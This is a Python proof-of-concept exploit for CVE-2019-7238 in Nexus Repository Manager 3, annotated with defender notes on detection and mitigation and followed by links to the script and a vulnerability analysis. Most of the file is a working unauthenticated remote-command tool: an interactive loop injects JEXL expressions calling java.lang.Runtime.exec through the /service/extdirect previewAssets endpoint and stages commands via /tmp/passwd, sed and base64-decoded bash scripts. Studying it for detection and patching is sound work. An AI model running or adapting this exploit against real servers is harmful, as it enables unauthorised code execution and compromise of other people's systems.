"""Proof-of-concept client for CVE-2019-7238 (Nexus Repository Manager 3).

What the script does, as visible below: it POSTs JSON-RPC style bodies to
``<remote>/service/extdirect`` with ``action: coreui_Component`` and
``method: previewAssets``.  The ``expression`` filter is typed ``jexl`` and
is used to reach ``java.lang.Runtime.exec``.  No credentials are attached to
any request.

Defender notes (review):
- Detection: requests to ``/service/extdirect`` whose body contains
  ``"method": "previewAssets"`` together with ``"type": "jexl"`` and an
  expression referencing ``class.forName`` / ``java.lang.Runtime`` are a
  direct indicator of this technique.  The Linux path below issues six such
  requests in quick succession per command, which is itself a usable
  behavioural signal.
- Mitigation: apply the vendor's fixed release for CVE-2019-7238 and do not
  expose the ``/service/extdirect`` endpoint to untrusted networks.
- ``verify=False`` disables TLS certificate verification on every request;
  ``remote`` is hard-coded to a loopback address.
"""
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import urllib3
import requests
import base64
import json
import sys

print("\nNexus Repository Manager 3 Remote Code Execution - CVE-2019-7238 \nFound by @Rico and @voidfyoo\n")

# Empty dict: requests are sent directly, no proxy configured.
proxy = {}
# Target base URL (loopback by default).
remote = 'http://127.0.0.1:8081'
# Selects the request sequence below: "LINUX" uses the multi-step file
# staging path, anything else falls through to the single-request branch.
ARCH = "LINUX"
# ARCH="WIN"

# Suppresses the warning emitted because every request uses verify=False.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def checkSuccess(r) -> None:
    """Print "OK" when the response reports a match, otherwise exit.

    Args:
        r: a ``requests`` response object (``status_code`` and ``text`` are read).

    Behaviour:
        - HTTP 200 and ``result.total`` > 0: prints "OK" and returns.
        - HTTP 200 and ``result.total`` == 0: prints "KO" and calls ``sys.exit()``.
        - any other status: prints the status code and calls ``sys.exit()``.

    NOTE(review): ``json.loads(r.text)`` is not guarded, so a 200 response
    with a non-JSON body (e.g. an HTML login page) raises an uncaught
    ``json.JSONDecodeError`` rather than printing "KO".  The ``KeyError``
    from a missing ``result``/``total`` key is likewise uncaught.
    """
    if r.status_code == 200:
        json_data = json.loads(r.text)
        if json_data['result']['total'] > 0:
            print("OK")
        else:
            print("KO")
            sys.exit()
    else:
        print("[-] Error status code", r.status_code)
        sys.exit()


# Probe: a harmless JEXL expression ("1==1").  A non-empty result set is taken
# as evidence that the endpoint evaluates the supplied expression.  From a
# monitoring standpoint this probe looks the same as the later requests
# except for the expression text.
print("[+] Checking if Content-Selectors exist =>", end=' ')
burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==1"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
checkSuccess(r)
print("")

# Interactive loop; Ctrl-C is the only exit path besides checkSuccess().
while True:
    try:
        if ARCH == "LINUX":
            # Command output is never returned to the client ("not reflected").
            command = input("command (not reflected)> ")
            command = base64.b64encode(command.encode('utf-8'))
            command_str = command.decode('utf-8')
            # Presumably done so the value can be embedded in the sed
            # s/// expression below, which uses '/' as its delimiter.
            command_str = command_str.replace('/', '+')

            # Step 1 of 6: copies /etc/passwd to /tmp/passwd as a writable
            # staging file.  Each step below is its own POST to the same
            # endpoint; only the expression text differs.
            print("[+] Copy file to temp directory =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"cp /etc/passwd /tmp/passwd\")"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
            checkSuccess(r)

            # Step 2 of 6: replaces line 1 of the staging file with a marker.
            print("[+] Preparing temp file =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i 1cpwn2 /tmp/passwd\")"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
            checkSuccess(r)

            # Step 3 of 6: deletes the remaining lines of the staging file.
            print("[+] Cleaning temp file =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i /[^pwn2]/d /tmp/passwd\")"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
            checkSuccess(r)

            # Step 4 of 6: substitutes the marker with a shell line that
            # decodes the base64 value into pwn.txt.  Host artefacts for
            # forensics: /tmp/passwd and pwn.txt (cwd of the Nexus process).
            print("[+] Writing command into temp file =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i 1s/pwn2/{echo," + command_str + "}|{base64,-d}>pwn.txt/g /tmp/passwd\")"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
            checkSuccess(r)

            # Step 5 of 6: runs the staging file with bash.
            print("[+] Decode base64 command =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"bash /tmp/passwd\")"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
            checkSuccess(r)

            # Step 6 of 6: runs pwn.txt with bash.
            print("[+] Executing command =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"bash pwn.txt\")"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
            checkSuccess(r)
            print('')
        else:
            # Non-Linux branch: the raw input is concatenated straight into
            # the JEXL expression in a single request.
            command = input("command (not reflected)> ")
            print("[+] Executing command =>", end=' ')
            burp0_url = remote + "/service/extdirect"
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"" + command + "\")"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
            checkSuccess(r)
            print('')
    except KeyboardInterrupt:
        print("Exiting...")
        break
腳本地址: https://github.com/mpgn/CVE-2019-7238/blob/master/CVE-2019-7238.py
漏洞分析: https://cert.360.cn/report/detail?id=3ec687ec01cccd0854e2706590ddc215